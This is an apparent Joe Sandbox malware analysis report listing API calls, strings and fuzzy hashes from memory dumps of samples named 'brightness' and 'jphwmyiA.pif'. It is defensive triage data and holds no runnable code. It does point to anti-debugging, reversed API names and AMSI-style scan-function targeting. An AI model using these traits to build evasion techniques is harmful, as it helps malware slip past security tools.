GetThreadLocale.KERNEL32(?,00000000,0283AA67,?,?,00000000), ref: 0283A9E8

Part of subcall function 0283A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0283A762

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0283AA67,?,?,00000000), ref: 0283AA18
EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0283AA23
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0283AA67,?,?,00000000), ref: 0283AA41
EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0283AA4C

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 468659517f86cf699f5d64ac607519424982c3c2ece26d701e343c43a86e1017
Instruction ID: d3277bc07c2ae7c756282dcc93a56606d996781d509a7f3141352ba08af41cc3
Opcode Fuzzy Hash: 468659517f86cf699f5d64ac607519424982c3c2ece26d701e343c43a86e1017
Instruction Fuzzy Hash: 3101F73E2402587BF707AA6C8D12B6E735DDB46720F910160F650E67C0F5689E104AEA

Function 0283AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0283AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0283AAAF

Part of subcall function 0283A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0283A762

Strings

eeee, xrefs: 0283ABBE
ggg, xrefs: 0283AB95
yyyy, xrefs: 0283ABA5

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: d42a75b40a21166ed54712400ea7d2e8aafe7ead209f4e38ca6cba1cdaa7b832
Instruction ID: b293307f6341923b85d59b680b55dafad397cfeba315bff1dbb76c2256532b16
Opcode Fuzzy Hash: d42a75b40a21166ed54712400ea7d2e8aafe7ead209f4e38ca6cba1cdaa7b832
Instruction Fuzzy Hash: D141F23D70410D4BEB0BEB6D88802BEB3EBDB85204B544565E5E2C7345EA78DD068AE2

Function 02848018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Strings

KernelBASE, xrefs: 02848051
AeldnaHeludoMteG, xrefs: 02848031

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 45aff55734558023b07df459618f5e5fdeccb9dd65ea3a8885e20a8de899e916
Instruction ID: 23cd1befa68ccf743333046da1168b38d206a5e033b7dcc7e82752d224696367
Opcode Fuzzy Hash: 45aff55734558023b07df459618f5e5fdeccb9dd65ea3a8885e20a8de899e916
Instruction Fuzzy Hash: 06F0963D65030CBFE701EFA8DC4295E77ADF7497407554520F900D3614EB74BD04AA96

Function 0284EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,0284F3CC,UacInitialize,0289237C,0285B40C,UacScan,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanString), ref: 0284EFCE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0284EFE0

Strings

KernelBase, xrefs: 0284EFC9
IsDebuggerPresent, xrefs: 0284EFDA

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 4f085b21190c85c3069a4855c3e4b078e65b8435c32331d2078a95bad05cd32a
Instruction ID: 0b040f89994ff112f829df2f19b9f67be08c70d5e06c72372cb54f72030b4774
Opcode Fuzzy Hash: 4f085b21190c85c3069a4855c3e4b078e65b8435c32331d2078a95bad05cd32a
Instruction Fuzzy Hash: 35D0226E3003342FB90033FC0CC080D024C8A440697200F61B022C11D3FE6B88111004

Function 0283C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0285D10B,00000000,0285D11E), ref: 0283C3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0283C40B

Strings

kernel32.dll, xrefs: 0283C3F5
GetDiskFreeSpaceExA, xrefs: 0283C405

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 220ecbc1d35817a32f497969990ab2018a4fb934fc8f80ea6356dd9a67de7823
Instruction ID: 43bfc7b2f62c0d11b1728e9ddaeca47d2b8f38a9058006a4bb3edcf14c562e37
Opcode Fuzzy Hash: 220ecbc1d35817a32f497969990ab2018a4fb934fc8f80ea6356dd9a67de7823
Instruction Fuzzy Hash: FCD05EADA403205AFB036BB96C8163636889704366B00D826E005E5242E7BD84148FD4

Function 0283E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0283E217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0283E233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0283E2AA
VariantClear.OLEAUT32(?), ref: 0283E2D3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 940c224ce8483e8f9faab1adeb11ae13dbe38e17e9d21f01d9f85f706582b477
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 2441D57DA016299BCB62DB58CC90BD9B3BDBF49614F0041D5EA49E7211DA34AF808FA1

Function 0283ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0283ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0283ACFD
GetModuleFileNameA.KERNEL32(02830000,?,00000105), ref: 0283AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0283ADAE

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 3a3b01d9e6222236c4b4a15a037544bb06613c038b5160339b8e8530bd0de0ba
Instruction ID: e2ed8f955b843310bd5f62ca5bf324404640990331edbcdce4b4941a1b7c66a5
Opcode Fuzzy Hash: 3a3b01d9e6222236c4b4a15a037544bb06613c038b5160339b8e8530bd0de0ba
Instruction Fuzzy Hash: 36412D7CA002589BDB22DB68CC84BDAB7FDAB08301F0440E5A548E7341DB75AF888F95

Function 0283ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0283ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0283ACFD
GetModuleFileNameA.KERNEL32(02830000,?,00000105), ref: 0283AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0283ADAE

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 1287e048a0fcba6c86fa2ff0a41d9adbea1c2e72a84a5df8ccf5085259a8f64f
Instruction ID: 0520d68f66eae8af21883d99d7359051c23542f6b1b4dfc8020b263b66c477a5
Opcode Fuzzy Hash: 1287e048a0fcba6c86fa2ff0a41d9adbea1c2e72a84a5df8ccf5085259a8f64f
Instruction Fuzzy Hash: 5641317CA402589BDB22DB6CCC84BDAB7FDAB08301F0400E5A548E7351DB75AF888F95

Function 02831C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac5157f766f3f2009f7f0dd1893fa83b6d9210a8130f9c34780e4a375229d55
Instruction ID: e231bfd603c0d1d0fdd4639ce62d88204460cad655ec7e39163dd6d45d004378
Opcode Fuzzy Hash: 5ac5157f766f3f2009f7f0dd1893fa83b6d9210a8130f9c34780e4a375229d55
Instruction Fuzzy Hash: 8CA1FA6E7106000BE71AAA7C9C883BDB3C2DBC5B25F18827EE11DCB785DB64C95687D1

Function 0283946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0283955A), ref: 028394F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0283955A), ref: 028394F8

Strings

yyyy, xrefs: 028394CD

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 420ad106ae45a5fb7abd4e1d79083036d44322cf8a4ce61c01c6c57b1f4f86b8
Instruction ID: 8f343cf6fd33cc17e6c9a5df87ff5ebcc78a590f26f68d4d4dfd36922198c997
Opcode Fuzzy Hash: 420ad106ae45a5fb7abd4e1d79083036d44322cf8a4ce61c01c6c57b1f4f86b8
Instruction Fuzzy Hash: 9D21627EA002189FDB12DF98C841AAE73B9EF08710F4140A5E949D7350D7B4DE40CBE6

Function 02848184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0284820E), ref: 028481F0

Strings

FlushInstructionCache, xrefs: 0284819D
Kernel32, xrefs: 028481CF

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 6c7aad7d2105eb8200f0a31dcbe719222fab2f6b3c05e87d836433e8bb94d2df
Instruction ID: 1ba7ce5fcf552795d4789249909903b42ffd82d2a853da49c58506d4067ee0bc
Opcode Fuzzy Hash: 6c7aad7d2105eb8200f0a31dcbe719222fab2f6b3c05e87d836433e8bb94d2df
Instruction Fuzzy Hash: EF01817DA40708BFE711EFA8DC41F5A77ADE748B10F554860BD00D3660DA74AD109B65

Function 02836444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0283644D
TlsGetValue.KERNEL32(00000020), ref: 02836462

Strings

(6~, xrefs: 02836467

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AllocValue
String ID: (6~
API String ID: 1189806713-4156424964
Opcode ID: 2bb17c531a9cc21a438b196b3596b5fffb8c5e609ecbd0e950e1055d8660a1e8
Instruction ID: 41414fa99bf0e3a52a05e7d18bbf10df9de8b82478c01af16efa2cf0466f57eb
Opcode Fuzzy Hash: 2bb17c531a9cc21a438b196b3596b5fffb8c5e609ecbd0e950e1055d8660a1e8
Instruction Fuzzy Hash: C1C012BCD44331AAEB02BBBC980460A329DEB01741B088820B504C7188FB39C0109F9A

Function 0284AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0284AD90
IsBadWritePtr.KERNEL32(?,00000004), ref: 0284ADC0
IsBadReadPtr.KERNEL32(?,00000008), ref: 0284ADDF
IsBadReadPtr.KERNEL32(?,00000004), ref: 0284ADEB

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction ID: 02a823c1bbb1b81b72a6362b2c6459d4fc0836a78bebeb77370abad8c03138f8
Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction Fuzzy Hash: 9421A2BD68061DABDB14DF29CC80BAE73A9EF44361F008111EE54DB341EF34E9119AE4

Analysis Process: jphwmyiA.pifPID: 6396, Parent PID: 2072COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	66.7%
Signature Coverage:	13.6%
Total number of Nodes:	648
Total number of Limit Nodes:	51

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

*, xrefs: 004020E1
[, xrefs: 00402047
W, xrefs: 00401B14
", xrefs: 00401B0F
5, xrefs: 00402109
v, xrefs: 0040206A
:, xrefs: 00401B28
6, xrefs: 004020C5
h, xrefs: 00401A6F
!, xrefs: 00401B1E
*, xrefs: 00401A1F
o, xrefs: 00402097
!, xrefs: 004020CF
', xrefs: 00401AF6
V, xrefs: 00401E19
[, xrefs: 00401B37
o, xrefs: 00401B8D
x, xrefs: 00401E69
U, xrefs: 004020F5
!, xrefs: 0040201A
{, xrefs: 00401B4B
v, xrefs: 0040212C
', xrefs: 00402006
., xrefs: 0040201F
4, xrefs: 00402136
), xrefs: 0040202E
x, xrefs: 00402088
o, xrefs: 00402159
{, xrefs: 00401E3C
v, xrefs: 00401B5A
D, xrefs: 00401DFB
4, xrefs: 00402074
V, xrefs: 00402038
W, xrefs: 00402033
v, xrefs: 00401E4B
___, xrefs: 0040227D
W, xrefs: 00401B23
%, xrefs: 004020FA
., xrefs: 00401B0A
8, xrefs: 00401BA9
0, xrefs: 00401BBD
W, xrefs: 004020E6
x, xrefs: 00401B78
{, xrefs: 0040205B
_._, xrefs: 00402257
x, xrefs: 0040214A
E, xrefs: 00401E0F
4, xrefs: 00401B64
{, xrefs: 0040211D

Memory Dump Source

Source File: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.3410702228.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3410702228.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 2A1E6C18 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH]q, xrefs: 2A1E6E63
PH]q, xrefs: 2A1E6E52

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 82c36a2a50cf27da2e801cef10b949c7a655a112014cec28e612931c25874129
Instruction ID: 3dc8c107909e82c470951eb67d68427ba731b324e8e3863d08792486c6ad0b0c
Opcode Fuzzy Hash: 82c36a2a50cf27da2e801cef10b949c7a655a112014cec28e612931c25874129
Instruction Fuzzy Hash: AF81D074E00218CFDB18DFA9D994ADDBBF2BF89314F20806AD419AB395DB346A45CF50

Function 2AD3BDC8 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3456975474.000000002AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ad30000_jphwmyiA.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 8c710b66e4b4551a37f3cf437f753e858ab30953a4a3bdb9d9a8fb5219dd14d3
Instruction ID: f8659befe0ca3dab9bc3c739d5abcf8ab3a0b9cddf45df0872696f0d9cd05db6
Opcode Fuzzy Hash: 8c710b66e4b4551a37f3cf437f753e858ab30953a4a3bdb9d9a8fb5219dd14d3
Instruction Fuzzy Hash: DDF16B34A00209CFDB04EFA9C884B9DBBF1BF48304F56C569D909AB265DB75E989CF40

Function 2A1D7A28 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc86b57d7f02e9fbd4579578484fda20bac0e83bf90e4836eb7ee8cb6139426
Instruction ID: 8603dfec0fb3cc0d37b6736c9b33076042d120ef41cd75a7c8af25ce3f2a998a
Opcode Fuzzy Hash: 0bc86b57d7f02e9fbd4579578484fda20bac0e83bf90e4836eb7ee8cb6139426
Instruction Fuzzy Hash: 01F1E675E01218CFDB14DFA9D884B9DBBB2BF48314F50C1A9D408AB365DB74AA85CF50

Function 2A3FA2B0 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 884f818e848066dc34306855b82ee7fed7736f9df7e86c94e3116b8991cb634d
Instruction ID: ec0ae163211cc15776eea8d7cdb056f90234bd44b0a166e43be3fcf9675a7705
